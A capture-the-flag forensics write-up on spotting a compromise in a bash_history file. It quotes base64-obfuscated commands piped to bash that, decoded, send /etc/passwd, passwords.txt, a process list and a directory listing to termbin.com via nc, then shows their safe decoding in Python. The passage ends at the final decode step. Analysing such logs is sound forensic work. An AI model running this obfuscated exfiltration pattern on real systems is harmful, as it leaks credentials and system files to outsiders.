Tags: bash base64 

Rating: 5.0

# Bash history

## Task

We suspect that one of BB's internal hosts has been compromised. I copied its ~./bash_history file. Maybe, there are some suspicious commands?

File: bash_history

Tags: forensics

## Solution

There is a lot of noise in the file, we can filter that out:

$ grep -Ev '^(totp-gen|ssh petr@praha-00[0-9])' bash_history

We notice some `echo BASE64 | base64 -d | bash` which look very suspicious.

echo YnJubzAwMQ== | base64 -d
echo cHMgYXggPiBwcm9jZXNzZXM= | base64 -d | bash
echo Y2F0IHByb2Nlc3NlcyB8IG5jIHRlcm1iaW4uY29tIDk5OTk= | base64 -d | bash
echo cm0gcHJvY2Vzc2Vz | base64 -d | bash
echo bHMgLWwgfCBuYyB0ZXJtYmluLmNvbSA5OTk5 | base64 -d | bash
echo ZWNobyBjM2x6YTNKdmJrTlVSbnQwU0dWNU
echo Y2F0IC9ldGMvcGFzc3dkIHwgbmMgdGVybWJpbi5jb20gOTk5OQ== | base64 -d | bash
echo Y2F0IHBhc3N3b3Jkcy50eHQgfCBuYyB0ZXJtYmluLmNvbSA5OTk5 | base64 -d | bash

There are two echos that don't base64-decode the string. To be on the safe side of not accidentally copy-pasting the whole line and executing random code we use python:

$ python -c 'from base64 import b64decode as decode; print(decode("ZWNobyBjM2x6YTNKdmJrTlVSbnQwU0dWNU"))'
$ python -c 'from base64 import b64decode as decode; print(decode("xYTjBNR3hsTFdGc2JDMUVZWFJoSVNGOQ=="))'

First one throws an exception due to incorrect padding: `binascii.Error: Incorrect padding`. Second one is just binary and unusable.

But wait! What if we combine those two?

$ python -c 'from base64 import b64decode as decode; print(decode("ZWNobyBjM2x6YTNKdmJrTlVSbnQwU0dWNUxYTjBNR3hsTFdGc2JDMUVZWFJoSVNGOQ=="))'
b'echo c3lza3JvbkNURnt0SGV5LXN0MGxlLWFsbC1EYXRhISF9'

This looks like another round of good old base64.

$ python -c 'from base64 import b64decode as decode; print(decode("c3lza3JvbkNURnt0SGV5LXN0MGxlLWFsbC1EYXRhISF9"))'